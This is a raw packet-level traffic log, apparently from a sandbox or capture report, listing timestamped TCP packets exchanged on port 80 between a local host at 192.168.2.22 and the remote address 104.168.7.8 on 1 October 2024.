                                                                                                                                Oct 1, 2024 09:25:30.357846975 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357851982 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357857943 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357870102 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357875109 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357882977 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357889891 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357901096 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357922077 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.358391047 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358402014 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358412981 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358424902 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358437061 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358438969 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.358447075 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358458042 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.358458996 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358469963 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358480930 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358510017 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.358822107 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358835936 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.358846903 CEST8049171104.168.7.8192.168.2.22
Oct 1, 2024 09:25:30.358856916 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.358864069 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.358869076 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.358879089 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.358884096 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.358891010 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.358901978 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.358901978 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.358920097 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.359311104 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359328985 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359338999 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359349966 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359360933 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359371901 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359375954 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.359381914 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359397888 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.359400034 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359406948 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.359411955 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359421968 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359435081 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359445095 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359452963 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.359456062 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359467983 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359474897 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.359478951 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359489918 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359491110 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.359503031 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359513998 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.359527111 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.359555006 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.361370087 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361382008 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361393929 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361406088 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361418009 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361428022 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361439943 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361438990 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.361439943 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.361452103 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361463070 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361468077 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.361474037 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361490965 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.361509085 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.361741066 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361799955 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361812115 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361831903 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.361845970 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.396159887 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.396193981 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.396203041 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.396222115 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.396249056 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.396250963 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.396260977 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.396271944 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.396284103 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.396305084 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.396328926 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.396383047 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444165945 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444192886 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444225073 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.444240093 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444286108 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.444308043 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444319963 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444364071 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.444432020 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444442987 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444453955 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444464922 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444479942 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444497108 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.444516897 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.444520950 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444534063 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444572926 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.444637060 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444648981 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444664955 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444684982 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.444823027 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444833994 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444845915 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444855928 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444866896 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444878101 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444879055 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.444890022 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444901943 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.444902897 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.444921970 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.444947958 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.445050955 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445060015 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445070982 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445081949 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445091963 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445108891 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.445130110 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.445209980 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445219994 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445231915 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445241928 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445254087 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.445259094 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445281029 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445285082 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.445292950 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445306063 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445317030 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445328951 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445346117 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445346117 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.445357084 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445358992 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.445386887 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.445657015 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445673943 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445684910 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445696115 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445719004 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.445821047 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445836067 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445846081 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.445862055 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.445882082 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446031094 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446044922 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446054935 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446065903 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446077108 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446082115 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446086884 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446099043 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446103096 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446110964 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446121931 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446121931 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446132898 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446151972 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446311951 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446321964 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446332932 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446341991 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446410894 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446439028 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446465015 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446479082 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446496010 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446507931 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446516991 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446525097 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446528912 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446540117 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446546078 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446551085 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446563959 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446564913 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446576118 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446587086 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446590900 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446599007 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446609020 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446609974 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446619987 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446635962 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446646929 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.446647882 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446670055 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.446702957 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.447243929 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.447254896 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.447264910 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.447274923 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.447287083 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.447304010 CEST  49171     80  192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.447304964 CEST     80  49171  104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.447316885 CEST     80  49171  104.168.7.8   192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447325945 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.447329044 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447340965 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447350979 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447360039 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.447361946 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447372913 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447390079 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447391987 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.447401047 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447412014 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447412968 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.447424889 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447434902 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.447436094 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447447062 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447458029 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447464943 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.447468042 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447479963 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447490931 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447494984 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.447503090 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447515011 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.447515965 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.447542906 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.447577953 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.448962927 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.449002028 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.449070930 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.449085951 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.449099064 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.449110985 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.449155092 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.449182987 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.449194908 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.449239969 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.484813929 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.484829903 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.484852076 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.484863043 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.484874964 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.484886885 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.484894991 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.484905958 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.484920025 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.484934092 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.484934092 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.484961987 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.532926083 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533142090 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533152103 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533163071 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533174992 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533184052 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533195019 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533205986 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533215046 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.533217907 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533230066 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533238888 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.533261061 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533279896 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.533302069 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.533339024 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533350945 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533350945 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.533363104 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533375025 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533385038 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533432007 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.533432961 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.533559084 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533581018 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533591032 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533601046 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533613920 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533622980 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533632040 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.533633947 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533646107 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533669949 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.533670902 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.533694983 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.533838987 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533849955 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533860922 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533910990 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.533943892 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533955097 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533965111 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533977985 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533987045 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.533999920 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.534003973 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534013987 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534024954 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534040928 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.534040928 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.534373045 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534384012 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534394979 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534404993 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534415007 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534426928 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534435987 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.534439087 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.534450054 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.534466028 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.534637928 CEST8049171104.168.7.8192.168.2.22
